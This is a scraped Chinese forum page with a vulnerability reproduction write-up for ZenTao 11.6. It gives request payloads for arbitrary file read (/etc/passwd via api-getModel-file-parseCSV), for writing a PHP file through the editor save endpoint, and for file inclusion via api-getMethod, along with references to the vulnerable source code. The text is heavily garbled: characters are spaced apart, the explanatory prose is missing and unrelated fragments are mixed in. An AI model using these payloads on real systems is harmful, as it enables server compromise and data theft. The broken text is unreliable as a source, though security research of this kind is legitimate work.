[6837] 2020-07-26_禅道11.6后台多个漏洞复现分析

文档创建者:s7ckTeam
浏览次数:7
最后更新:2025-01-17
2020-07-26_禅道11.6后台多个漏洞复现分析 1 1 . 6   E   2 0 2 0 - 0 7 - 2 6   A r i c e 使 N o . 1 N o . 1 h t t p : / / * * * . * . * . * / z e n t a o p m s 1 1 . 6 / w w w / a p i - g e t M o d e l - f i l e - p a r s e C S V - f i l e N a m e = / e t c / p a s s w d p a y l o a d 使 a p i g e t M o d e l f i l e p a r s e C S V f i l e N a m e f i l e p a r s e C S V f i l e N a m e a p i g e t M o d e l / m o d u l e / a p i / c o n t r o l . p h p e t M o d e l p a y l o a d f i l e p a r s e C S V f i l e N a m e 5 0 f i l e p a r s e C S V / m o d u l e / f i l e / m o d e l . p h p   .
. t x t . p h p / f r a m e w o r k / b a s e / r o u t e r . c l a s s . p h p p a r s e P a t h I n f o N o . 2 N o . 2 h t t p : / / * * * . * . * . * / z e n t a o p m s 1 1 . 6 / w w w / / a p i - g e t M o d e l - e d i t o r - s a v e - f i l e P a t h = / t m p / 1 2 3 4 P O S T f i l e C o n t e n t = < ? p h p   p h p i n f o ( ) ; ? > a p i g e t M o d e l e d i t o r s a v e f i l e P a t h
5 0 e d i t o r s a v e f i l e P a t h / m o d u l e / e d i t o r / m o d e l . p h p 3 6 8 f i l e C o n t e n t p o s t N o . 3 N o . 3 h t t p : / / * * * . * * * . * * . * * * / z e n t a o p m s 1 1 . 6 / w w w / a p i - g e t M o d e l - a p i - g e t M e t h o d - f i l e P a t h = / t m p / 1 / 1 p a y l o a d a p i g e t M o d e l a p i g e t M e t h o d f i l e P a t h
/ m o d u l e / a p i / m o d e l . p h p 1 8 i f ( ! c l a s s _ e x i s t s ( $ c l a s s N a m e ) )   h e l p e r : : i m p o r t ( $ f i l e N a m e ) ; / f r a m e w o r k / b a s e / h e l p e r . c l a s s . p h p i m p o r t 1 9 5 i n c l u d e r e a l p a t h < ? p h p e c h o   r e a l p a t h ( ' / t m p / t e s t ' ) ; ? > / p r i v a t e / t m p / t e s t / t m p / t e s t   / t m p / t e s t
$ f i l e N a m e     =   d i r n a m e ( $ f i l e P a t h ) ; d i r n a m e < ? p h p e c h o   d i r n a m e ( " c : / t e s t w e b / h o m e . p h p " )   .   " n " ; e c h o   d i r n a m e ( " / t e s t w e b / h o m e . p h p " )   .   " n " ; e c h o   d i r n a m e ( " C : / t e s t / h o m e . p h p / " ) .   " n " ; e c h o   d i r n a m e ( " C : / t t t t / h o m e . p h p / 1 2 3 4 " )   .   " n " ; ? > c : / t e s t w e b / t e s t w e b C : / t e s t C : / t t t t / h o m e . p h p h t t p : / / * * * . * * * . * * . * * * / z e n t a o p m s 1 1 . 6 / w w w / a p i - g e t M o d e l - a p i - g e t M e t h o d - f i l e P a t h = / t m p / t e s t / 1 2 3 4 h t t p s : / / w i k i . 0 - s e c . o r g / i m g / 2 0 2 0 0 4 1 9 / a 0 b 1 b 1 3 4 2 f b 1 4 4 c 6 b 6 5 2 4 4 1 3 8 b 3 2 a 4 4 f . p n g h t t p s : / / w i k i . 0 - s e c . o r g / i m g / 2 0 2 0 0 4 1 9 / 8 a 5 9 b d b 3 4 b 6 d 4 2 2 7 b 4 5 7 2 6 2 3 c b f 9 c 8 5 7 . p n g
E   h t t p s : / / w w w . e a s y a q . c o m E m o t e t N C S C A P T 2 9 C O V I D - 1 9     A P I F U D 1 0 1 i P h o n e U n c 0 v e r   |   2 0 2 0   E
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则